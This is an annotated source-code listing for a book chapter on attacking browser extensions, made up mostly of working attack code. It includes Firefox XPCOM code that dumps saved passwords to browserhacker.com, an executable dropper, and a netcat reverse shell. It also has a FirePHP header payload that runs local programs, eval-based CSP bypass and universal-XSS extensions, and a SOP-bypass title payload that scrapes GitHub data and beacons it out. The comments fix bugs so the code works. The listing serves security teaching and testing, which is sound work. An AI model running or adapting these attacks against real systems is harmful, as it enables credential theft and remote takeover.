
Ch7 Source Code - Attacking Extensions


Attacking XPCOM

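// Exposing the Login Manager
//
// Runs with chrome (XPCOM) privileges, e.g. from inside a vulnerable
// Firefox extension: dumps every saved credential and sends each one to
// browserhacker.com in the query string of a new window.

// Get the login manager service
var l2m = Components.classes["@mozilla.org/loginmanager;1"]
  .getService(Components.interfaces.nsILoginManager);

// Get all credentials from the login manager. The {} is the count
// out-parameter; the result is an array of login objects exposing
// hostname / username / password (read below). NOTE(review): if a
// master password is set this call may prompt for it -- confirm.
var allCredentials = l2m.getAllLogins({});

// Extract all the hosts, usernames and passwords.
// Fixed off-by-one: the original loop ran while i <= length, so the last
// iteration dereferenced allCredentials[length] (undefined) and threw a
// TypeError after the final popup.
for (var i = 0; i < allCredentials.length; i++) {
  var cred = allCredentials[i];
  var url = "http://browserhacker.com/";
  // encodeURIComponent, not encodeURI: encodeURI leaves '&', '=', '+'
  // and '#' unescaped, so a password containing any of them would be
  // split or truncated when the receiver parses the query string.
  url += "?host=" + encodeURIComponent(cred.hostname);
  url += "&user=" + encodeURIComponent(cred.username);
  url += "&password=" + encodeURIComponent(cred.password);
  window.open(url);
}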

// Reading from the filesystem
// document.ReadURL.readFile() is not a standard DOM API; presumably it is
// a privileged helper that the targeted extension exposes to page content
// (its contract is not visible here -- confirm against the extension).
// Handing it a file:// URL reads a local file from ordinary web content.
var fileToRead="file:///C:/boot.ini";   // Windows-specific demo target
var fileContents=document.ReadURL.readFile(fileToRead);


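// Writing to the filesystem
//
// Drops `bdata` as an executable in the user's home directory using the
// XPCOM file APIs (chrome privileges required).
//
// bdata: file contents as a "binary string" (one byte per char, code
//        points 0..255). nsIFileOutputStream.write() takes a string plus
//        a byte count, so bdata.length must be the byte length; chars
//        above 0xFF would be truncated. Assumed here, not checked.
// Returns nothing. XPCOM exceptions propagate if the file cannot be
// created or written.
function makeFile(bdata){
  // rwxrwxrwx, spelled parseInt(...) because a bare "0777" literal is a
  // syntax error in strict-mode code. The original passed decimal 777
  // (== 01411 octal) to createUnique() while using 0777 for stream.init();
  // both now share one mode.
  // NOTE(review): 0777 leaves the dropped binary world-writable; 0700 is
  // enough for the owner to execute it and is the safer choice.
  var MODE_RWX_ALL = parseInt("777", 8);
  // NSPR open flags (the original used the raw values 0x04 | 0x08 | 0x20)
  var PR_RDWR = 0x04;
  var PR_CREATE_FILE = 0x08;
  var PR_TRUNCATE = 0x20;

  // Resolve the user's home directory through the directory service
  var workingDir = Components.classes["@mozilla.org/file/directory_service;1"]
    .getService(Components.interfaces.nsIProperties)
    .get("Home", Components.interfaces.nsIFile);

  // Build the target path. The "\\" separator is Windows-only; on other
  // platforms it ends up as a literal backslash in the file name.
  var aFile = Components.classes["@mozilla.org/file/local;1"]
    .createInstance(Components.interfaces.nsILocalFile);
  aFile.initWithPath(workingDir.path + "\\filename.exe");
  // createUnique() is meant to pick a non-clashing name if filename.exe
  // already exists, so the final name is whatever aFile points at after
  // this call (per nsIFile docs -- confirm).
  aFile.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, MODE_RWX_ALL);

  // "Safe" output stream: per nsISafeOutputStream docs the data goes to a
  // temp file that replaces the target only on finish(), so a partial
  // write does not leave a torn file behind.
  var stream = Components.classes["@mozilla.org/network/safe-file-outputstream;1"]
    .createInstance(Components.interfaces.nsIFileOutputStream);
  stream.init(aFile, PR_RDWR | PR_CREATE_FILE | PR_TRUNCATE, MODE_RWX_ALL, 0);
  stream.write(bdata, bdata.length);
  if (stream instanceof Components.interfaces.nsISafeOutputStream) {
    stream.finish();   // commit the temp file over the target
  } else {
    stream.close();
  }
}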


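// Executing Operating System Commands
//
// Launches a reverse shell with chrome (XPCOM) privileges: /bin/nc
// connects back to browserhacker.com:12345 and attaches /bin/bash to the
// socket. Unix-only as written (hard-coded /bin paths).
// Fix: the identifier "Components" was broken across two lines in the
// listing, which made the snippet a syntax error as published.
var lFile = Components.classes["@mozilla.org/file/local;1"]
  .createInstance(Components.interfaces.nsILocalFile);
var lPath = "/bin/nc";
lFile.initWithPath(lPath);
var process = Components.classes["@mozilla.org/process/util;1"]
  .createInstance(Components.interfaces.nsIProcess);
process.init(lFile);
// run(blocking, args, argCount): blocking=false returns immediately and
// argCount must equal args.length (4 here).
// NOTE: `-e` (exec program on connect) exists only in some netcat builds
// (e.g. nc.traditional, ncat); the OpenBSD nc shipped by many distros
// rejects it, so check the target's netcat first.
process.run(false, ['-e', '/bin/bash', 'browserhacker.com', '12345'], 4);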

Chrome Extension CSP Bypass Example

Extension manifest (note: the content_scripts entry lists "all_frames" twice; JSON parsers keep the last value, so the duplicate is redundant but harmless. This is a Manifest V2 extension, which current Chrome releases no longer load, so reproducing the demo needs an older browser build):

{
  "name": "Browser Hacker's Handbook CSP Bypass Example",
  "version": "1.0",
  "description": "Browser Hacker's Handbook CSP Bypass Demonstration",
  "homepage_url": "http://browserhacker.com",
  "permissions": [
	"http://content-security-policy.com/*"
  ],
    "content_scripts": [
    {
      "all_frames": true, 
      "js": [
        "cs.js"
      ], 
      "matches": [
        "http://content-security-policy.com/*"
      ], 
      "run_at": "document_end",
      "all_frames": true
    }
    ],
    "manifest_version": 2
}

cs.js source code:


// Get bhh URL parameter: everything after the first "bhh=" in the page
// URL (including any later query parameters or the fragment) is taken
// verbatim; undefined when the marker is absent.
var bhh = document.location.href.split('bhh=')[1];
// SECURITY: eval() of attacker-controlled URL data. That is the point of
// this demo -- the content script runs in the extension's isolated world,
// so the page's CSP does not restrict it -- but it is exactly the pattern
// never to ship in a real extension.
if (bhh !== undefined) {
    eval(bhh); // eval the parameter
}


FirePHP Exploitation

FirePHP extension - XHR request to trigger the HTTP response with the exploit code

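// FirePHP exploitation, step 1: fire a request whose response carries the
// X-Wf-* headers shown below. FirePHP renders them in the Firebug console;
// the payload only runs once the logged array is expanded (mouseover).
console.log('Exploit FirePHP start');
// xhr was an implicit global and the statements lacked semicolons.
var xhr = new XMLHttpRequest();
// Async GET; no response handler is needed -- only the headers matter.
xhr.open("GET", "http://browserhacker.com/", true);
xhr.send();
console.log('Mouseover FirePHP array to finish');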

FirePHP extension - HTTP response containing exploit code (the leading "476|" in X-Wf-1-1-1-1 should be the byte length of the JSON that follows; per the Wildfire JsonStream protocol a mismatched prefix causes the message to be dropped, so recompute it if the payload is edited)

HTTP/1.1 200 OK
Date: Wed, 07 Aug 2013 00:27:48 GMT
Server: Apache
Last-Modified: Fri, 29 Mar 2013 22:45:39 GMT
ETag: "401b9-0-4d91807c0760e"
Accept-Ranges: bytes
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1
X-Wf-1-1-1-1: 476|{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);lFile.initWithPath(\"/Applications/Calculator.app/Contents/MacOS/Calculator\");var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);process.init(lFile);process.run(true,[],0);void(0);<\/SCRIPT>":"PWNT"}}|

LastPass detection

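// LastPass detection
//
// Page-context heuristic: when LastPass binds to a login form it injects
// an element with id "hiddenlpsubmitdiv" and an inline <script> that
// references "lastpass_iter". Either artefact indicates the extension is
// installed and active. Requires jQuery ($) for the :contains selector.
var result = "Not in use or not installed";

// getElementById() returns null, never undefined, when the element is
// absent, so one null check replaces the original typeof + null test.
var lpdiv = document.getElementById('hiddenlpsubmitdiv');
if (lpdiv != null) {
  // NOTE(review): the message says "<script> tag" but the id suggests a
  // <div>; the element type is not checked here.
  result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
} else if ($("script:contains(lastpass_iter)").length > 0) {
  // jQuery-only ":contains" matches against the inline script's text
  result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
} else if (document.getElementsByTagName("form").length === 0) {
  // LastPass only instruments pages with forms, so the absence of both
  // markers is inconclusive here.
  result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
}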

Chrome Extension SOP Bypass example

Extension manifest ("<all_urls>" in both permissions and matches gives the content script cross-origin XHR to every site; "all_frames" is listed twice and the duplicate is redundant; Manifest V2 no longer loads in current Chrome):

{
  "name": "Browser Hacker's Handbook SOP Bypass Example",
  "version": "1.0",
  "description": "Browser Hacker's Handbook SOP Bypass Demonstration",
  "homepage_url": "http://browserhacker.com",
  "permissions": [
	"<all_urls>"
  ],
    "content_scripts": [
    {
      "all_frames": true, 
      "js": [
        "cs.js"
      ], 
      "matches": [
        "<all_urls>"
      ], 
      "run_at": "document_end",
      "all_frames": true
    }
    ],
    "manifest_version": 2
}

cs.js source code:


// Placeholder sink for the harvested page title; the demo never fills it
// in, so it returns undefined without side effects.
function do_something(title) {
  void title; // intentionally unused
}

// Read the page-controlled title and hand it to do_something() after
// 500 ms. The code-string form of setTimeout is the SOP-bypass vector:
// the title is spliced into source text that is later evaluated in the
// content script's world, so a title that closes the string literal (see
// the attack vector example) runs arbitrary code with the extension's
// cross-origin access. A function callback would remove the bug.
var title = document.title;
window.setTimeout('do_something("'.concat(title, '")'), 500);

Attack vector example (the `<TITLE>` text closes the string literal inside the extension's `setTimeout` call, so everything up to the final `a=("` executes in the content-script context and can read github.com cross-origin; the regex targets the 2013 markup of the GitHub settings page and will need updating):

<HTML>
<HEAD>
<TITLE>");
	var xhr = new XMLHttpRequest();
	xhr.open("GET", 'https://github.com/settings/profile/', true);
	
	xhr.onreadystatechange = function() {
	  if (xhr.readyState == 4) {
		github_settings_page = xhr.responseText;
		var name_regexp = /<input type="text" value="(.*)" tabindex="2"\/>/g; 
		var name_arr = name_regexp.exec(github_settings_page);
		name = name_arr[1];
		new Image().src = "http://browserhacker.com/" + encodeURI(name);
	  };
	};
	xhr.send();
	a=("</TITLE>
</HEAD>
<BODY>
	Browser Hacker's Handbook Extension SOP Bypass Example
</BODY>
</HTML>


Chrome Extensions Universal XSS example:

Manifest example (identical in scope to the SOP bypass manifest: "<all_urls>" exposes the content script, and its eval below, on every page; "all_frames" is duplicated and the duplicate is redundant; Manifest V2 no longer loads in current Chrome):

{
  "name": "Browser Hacker's Handbook UXSS Example",
  "version": "1.0",
  "description": "Browser Hacker's Handbook Universal XSS Demonstration",
  "homepage_url": "http://browserhacker.com",
  "permissions": [
	"<all_urls>"
  ],
    "content_scripts": [
    {
      "all_frames": true, 
      "js": [
        "cs.js"
      ], 
      "matches": [
        "<all_urls>"
      ], 
      "run_at": "document_end",
      "all_frames": true
    }
    ],
    "manifest_version": 2
}

cs.js source code:


// Get bhh URL parameter: everything after the first "bhh=" in the page
// URL (including any later query parameters or the fragment) is taken
// verbatim; undefined when the marker is absent.
var bhh = document.location.href.split('bhh=')[1];
// SECURITY: eval() of attacker-controlled URL data on every page the
// "<all_urls>" manifest matches -- that is what makes this a universal
// XSS. Intentional for the demo; never ship this pattern.
if (bhh !== undefined) {
    eval(bhh); // eval the parameter
}